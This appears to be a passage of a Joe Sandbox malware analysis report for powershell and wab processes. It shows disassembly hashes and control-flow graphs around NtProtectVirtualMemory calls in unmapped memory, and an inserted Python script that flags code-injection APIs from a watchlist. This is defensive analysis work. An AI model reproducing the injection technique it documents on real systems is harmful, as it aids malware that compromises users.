                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (o]q$(o]q$(o]q$(o]q
                                                                            • API String ID: 0-1261621458
                                                                            • Opcode ID: 9f6e7a302ccf72e4af13ee4acf9efbbe31f042c45ebe6c2d01e7a5eef3914f66
                                                                            • Instruction ID: 9d50ce865e7765cf803913a78a2df27a94dc491a7f688622e1163397b9c0bd72
                                                                            • Opcode Fuzzy Hash: 9f6e7a302ccf72e4af13ee4acf9efbbe31f042c45ebe6c2d01e7a5eef3914f66
                                                                            • Instruction Fuzzy Hash: 8BF115B1704306DFDB198F78D8547AB7BA2EF85310F14846AE5168B3D2DB31E846CBA1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84}l$84}l$tP]q$tP]q
                                                                            • API String ID: 0-1669528957
                                                                            • Opcode ID: 65a1e89f8be7591ebe1fba317661c2c430156327b45a9f1fe7a9e252d45f66a2
                                                                            • Instruction ID: a7016e3ee88d8fa1b1eaa9bddfa0f481b9280f1435f07cec9b180765725eee53
                                                                            • Opcode Fuzzy Hash: 65a1e89f8be7591ebe1fba317661c2c430156327b45a9f1fe7a9e252d45f66a2
                                                                            • Instruction Fuzzy Hash: 3551A0B0A00225DBDB2CEE68C544A6BB7F2FF89614F198959D8166B3D0D772EC41CBD0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84}l$84}l$tP]q$tP]q
                                                                            • API String ID: 0-1669528957
                                                                            • Opcode ID: c904c9c5515d4b08dbca15a7968d30ca46c3ccc82e236662d4aabea7aa60f336
                                                                            • Instruction ID: 18185382b66bc1791f9e34583972519e9ee643baa431fa3bd660d9079e109ca6
                                                                            • Opcode Fuzzy Hash: c904c9c5515d4b08dbca15a7968d30ca46c3ccc82e236662d4aabea7aa60f336
                                                                            • Instruction Fuzzy Hash: 314179B1604355AFC7194A7A8850667BFF6EF85712F1488AEE4459F381C631DD05C3E1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$$]q
                                                                            • API String ID: 0-858218434
                                                                            • Opcode ID: 6f319921016222d3a82f78ce6dfc17ba063bff2d4c17964ec427ca54bcee23bd
                                                                            • Instruction ID: 0d593c552b3872520e9895c14374ba4a4d4ff18560cc15037539fc0d20df0587
                                                                            • Opcode Fuzzy Hash: 6f319921016222d3a82f78ce6dfc17ba063bff2d4c17964ec427ca54bcee23bd
                                                                            • Instruction Fuzzy Hash: F02129B13543065BD72C197E9950B37B7EA9BC1711F24842AD946CB3C1DD75E84283F1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $]q$$]q$$]q$$]q
                                                                            • API String ID: 0-858218434
                                                                            • Opcode ID: 643062c690c696ff79d6628590ea9ac33b315361309efb157cad8ee5b3fb0c40
                                                                            • Instruction ID: 0d47ca0d7ff11ae70c2c37920bf8a0fe06bda700fc111008dc81b8449acb6385
                                                                            • Opcode Fuzzy Hash: 643062c690c696ff79d6628590ea9ac33b315361309efb157cad8ee5b3fb0c40
                                                                            • Instruction Fuzzy Hash: 8A116DF5A0030B9FDF2C8E698580667B7F5BF91611F18846AD84B87381D731E585CBE2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4']q$4']q$$]q$$]q
                                                                            • API String ID: 0-978391646
                                                                            • Opcode ID: 7d4faca9af1b74c4ef8d7f00620f494963c1a2c3dd2a44b754928c4ca34b7531
                                                                            • Instruction ID: d6c21a0b5d232d0c83ec1c04a261d5a96f003fbe82af3dd1de3094e81984f3ee
                                                                            • Opcode Fuzzy Hash: 7d4faca9af1b74c4ef8d7f00620f494963c1a2c3dd2a44b754928c4ca34b7531
                                                                            • Instruction Fuzzy Hash: C001D46070D3894FC32F063C186016A6FB2DF83A5071A09D7D492DB3D7C9588D06C3B6

                                                                            Execution Graph

                                                                            Execution Coverage:15.7%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:100%
                                                                            Total number of Nodes:3
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 8859 24c2968 8860 24c29b6 NtProtectVirtualMemory 8859->8860 8862 24c2a00 8860->8862

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 138 24c2510-24c2554 139 24c2556-24c2558 138->139 140 24c2560-24c2563 138->140 141 24c28ce-24c28fd 139->141 142 24c255e 139->142 140->141 143 24c2569-24c258c 140->143 159 24c2904-24c2908 141->159 142->143 146 24c258e-24c2590 143->146 147 24c2598-24c259b 143->147 146->141 149 24c2596 146->149 147->141 150 24c25a1-24c25c7 147->150 149->150 153 24c25c9-24c25cd 150->153 154 24c25d5-24c25d9 150->154 153->141 157 24c25d3 153->157 154->141 155 24c25df-24c25ed 154->155 160 24c25fc-24c2604 155->160 161 24c25ef-24c25fa 155->161 157->155 162 24c290a-24c2914 159->162 163 24c2915-24c29fe NtProtectVirtualMemory 159->163 164 24c2607-24c2609 160->164 161->164 191 24c2a07-24c2a2c 163->191 192 24c2a00-24c2a06 163->192 166 24c260b-24c260d 164->166 167 24c2615-24c2618 164->167 166->141 168 24c2613 166->168 167->141 169 24c261e-24c2641 167->169 168->169 173 24c264d-24c2650 169->173 174 24c2643-24c2645 169->174 173->141 176 24c2656-24c267a 173->176 174->141 175 24c264b 174->175 175->176 179 24c267c-24c267e 176->179 180 24c2686-24c2689 176->180 179->141 182 24c2684 179->182 180->141 183 24c268f-24c26b0 180->183 182->183 186 24c26bc-24c26bf 183->186 187 24c26b2-24c26b4 183->187 186->141 190 24c26c5-24c26e9 186->190 187->141 189 24c26ba 187->189 189->190 196 24c26eb-24c26ed 190->196 197 24c26f5-24c26f8 190->197 192->191 196->141 200 24c26f3 196->200 197->141 198 24c26fe-24c2722 197->198 202 24c272e-24c2731 198->202 203 24c2724-24c2726 198->203 200->198 202->141 205 24c2737-24c275b 202->205 203->141 204 24c272c 203->204 204->205 207 24c275d-24c275f 205->207 208 24c2767-24c276a 205->208 207->141 209 24c2765 207->209 208->141 210 24c2770-24c2783 208->210 209->210 210->159 212 24c2789-24c27b8 210->212 213 24c27ba-24c27bc 212->213 214 24c27c4-24c27c7 212->214 213->141 215 24c27c2 213->215 214->141 216 24c27cd-24c27e5 214->216 215->216 218 24c27e7-24c27e9 216->218 219 24c27f1-24c27f4 216->219 218->141 220 24c27ef 218->220 219->141 221 24c27fa-24c2811 219->221 220->221 224 24c28bd-24c28c6 221->224 225 24c2817-24c283a 221->225 224->212 228 24c28cc 224->228 226 24c283c-24c283e 225->226 227 24c2846-24c2849 225->227 226->141 229 24c2844 226->229 227->141 230 24c284f-24c287f 227->230 228->159 229->230 232 24c2887-24c288a 230->232 233 24c2881-24c2883 230->233 232->141 235 24c288c-24c28a9 232->235 233->141 234 24c2885 233->234 234->235 237 24c28ab-24c28ad 235->237 238 24c28b1-24c28b4 235->238 237->141 239 24c28af 237->239 238->141 240 24c28b6-24c28bb 238->240 239->240 240->159
                                                                            APIs
                                                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 024C29F1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3238647491.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_24c0000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID: 4|bq
                                                                            • API String ID: 2706961497-1932486993
                                                                            • Opcode ID: d438a15c1b4998801f9b55907d4e0213cd1de0d79dd78f3ee7cda0243982a365
                                                                            • Instruction ID: dd371a30a684fc67e720184e681a0cc7572edc120c00536230f3cb8d75e8f353
                                                                            • Opcode Fuzzy Hash: d438a15c1b4998801f9b55907d4e0213cd1de0d79dd78f3ee7cda0243982a365
                                                                            • Instruction Fuzzy Hash: 78E1C235F042054BDB54CA7D8C903AE76A36FC4224F78823EE915EB7C4EBF499068761

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 700 24c2968-24c29fe NtProtectVirtualMemory 703 24c2a07-24c2a2c 700->703 704 24c2a00-24c2a06 700->704 704->703
                                                                            APIs
                                                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 024C29F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3238647491.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_24c0000_wab.jbxd
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2706961497-0
                                                                            • Opcode ID: a4f3cc94dc4d641baa7283050be731b0dc4e472647fac32fb8c8ebd78dd12794
                                                                            • Instruction ID: e762b7f27f818dfaf29d8e9714db7d0d59eae6b025eac28b00c949c60f2dfc8a
                                                                            • Opcode Fuzzy Hash: a4f3cc94dc4d641baa7283050be731b0dc4e472647fac32fb8c8ebd78dd12794
                                                                            • Instruction Fuzzy Hash: A321E6B5D013499FCB10DFAAD984ADEFBF5FF48310F20842AE519A7250C775A940CBA5
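The two entries above are the part of this disassembly section worth acting on: in process 9 (wab, snapshot hcaresult_9_2_24c0000_wab.jbxd) a region the sandbox could not map to any PE image ("based on PE: false") calls NtProtectVirtualMemory, and the report lists that one call site (ref 024C29F1) twice, once in the small function at 24c2968 and once in the larger function at 24c2510 whose control-flow graph contains the same block. The Python below is an added example, not Joe Sandbox code or part of this report: it parses the report's own "Memory Dump Source" / "APIs" layout, keeps only functions living in non-PE-backed memory, and collapses the two entries to a single (process, API, call-site) finding. The sample text is a hand-constructed excerpt of the lines shown on this page, the API watchlist is my own assumption, and the function and class names are illustrative.

```python
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed excerpt: three function entries copied from this report's
# disassembly section (process 6 = powershell, process 9 = wab), in the layout
# the report prints them. It is a sample for the parser, not the full report.
SAMPLE_REPORT = """\
Strings
Memory Dump Source
• Source File: 00000006.00000002.2444703972.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
Similarity
• API ID:
• Instruction Fuzzy Hash: C001D46070D3894FC32F063C186016A6FB2DF83A5071A09D7D492DB3D7C9588D06C3B6
APIs
• NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 024C29F1
Strings
Memory Dump Source
• Source File: 00000009.00000002.3238647491.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
• Snapshot File: hcaresult_9_2_24c0000_wab.jbxd
• API ID: MemoryProtectVirtual
• Instruction Fuzzy Hash: 78E1C235F042054BDB54CA7D8C903AE76A36FC4224F78823EE915EB7C4EBF499068761
APIs
• NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 024C29F1
Memory Dump Source
• Source File: 00000009.00000002.3238647491.00000000024C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
• Snapshot File: hcaresult_9_2_24c0000_wab.jbxd
• API ID: MemoryProtectVirtual
• Instruction Fuzzy Hash: A321E6B5D013499FCB10DFAAD984ADEFBF5FF48310F20842AE519A7250C775A940CBA5
"""

# Memory-manipulation primitives that, when reached from a region the sandbox
# could not map to a PE image ("based on PE: false"), usually mean a loader is
# staging or injecting code. The watchlist is an assumption; extend it to taste.
INJECTION_APIS = {"NtProtectVirtualMemory", "VirtualProtect", "VirtualProtectEx",
                  "NtAllocateVirtualMemory", "VirtualAlloc", "VirtualAllocEx", "NtWriteVirtualMemory",
                  "WriteProcessMemory", "NtCreateThreadEx", "CreateRemoteThread", "NtMapViewOfSection"}
_API_LINE = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")   # "• Api.MODULE(args), ref: ADDR"
_SOURCE = re.compile(r"^(\d+)\.")                                          # leading field is the process index
_SNAPSHOT = re.compile(r"^hcaresult_\d+_\d+_[0-9a-f]+_(.+)\.jbxd$")        # trailing field is the image name
Finding = namedtuple("Finding", "process image api ref")


@dataclass
class FunctionEntry:
    process: int = -1        # process index as printed in the Source File name
    image: str = ""          # image name taken from the Snapshot File name
    backed_by_pe: bool = True
    api_id: str = ""
    apis: list = field(default_factory=list)   # (name, module, ref) tuples


def parse_entries(text: str) -> list:
    """Split report text into one FunctionEntry per disassembled function."""
    entries, cur, mode = [], FunctionEntry(), None
    for raw in text.splitlines():
        line = raw.strip()                  # the rendered page indents every line
        if line in ("APIs", "Strings", "Memory Dump Source"):
            mode = line                     # the header decides how bullets are read
        elif line.startswith("• ") and mode == "APIs":
            m = _API_LINE.match(line)
            if m:
                cur.apis.append((m[1], m[2], m[4].upper()))
        elif line.startswith("• "):
            key, _, value = line[2:].partition(":")
            key, value = key.strip(), value.strip()
            if key == "Source File":
                m = _SOURCE.match(value)
                if m:
                    cur.process = int(m[1], 10)
                cur.backed_by_pe = "based on PE: true" in value
            elif key == "Snapshot File":
                m = _SNAPSHOT.match(value)
                cur.image = m[1] if m else value
            elif key == "API ID":
                cur.api_id = value
            elif key == "Instruction Fuzzy Hash":
                entries.append(cur)         # last field of every entry: close it
                cur, mode = FunctionEntry(), None
    return entries


def find_injection_primitives(entries: list) -> dict:
    """Map each watched call site in non-PE-backed memory to the number of
    function entries that reach it; keying on (process, api, ref) stops the
    same instruction from being reported once per enclosing function."""
    hits = {}
    for e in entries:
        if e.backed_by_pe:
            continue
        for name, _module, ref in e.apis:
            if name in INJECTION_APIS:
                key = Finding(e.process, e.image, name, ref)
                hits[key] = hits.get(key, 0) + 1
    return hits


if __name__ == "__main__":
    for f, n in find_injection_primitives(parse_entries(SAMPLE_REPORT)).items():
        print(f"process {f.process} ({f.image}): {f.api} at {f.ref}, "
              f"reached from {n} disassembled functions in non-PE-backed memory")
```

On this page the powershell entries (process 6) list no API at all and so produce nothing, while the wab entries collapse to one finding: NtProtectVirtualMemory at 024C29F1, reached from two disassembled functions. The call-site key, not the function count, is the right unit for a detection note or a YARA-adjacent hunt, because the report's IDA plugin emits one entry per function boundary it recognises and a single call can therefore appear several times.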
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.3238449814.000000000248D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0248D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_248d000_wab.jbxd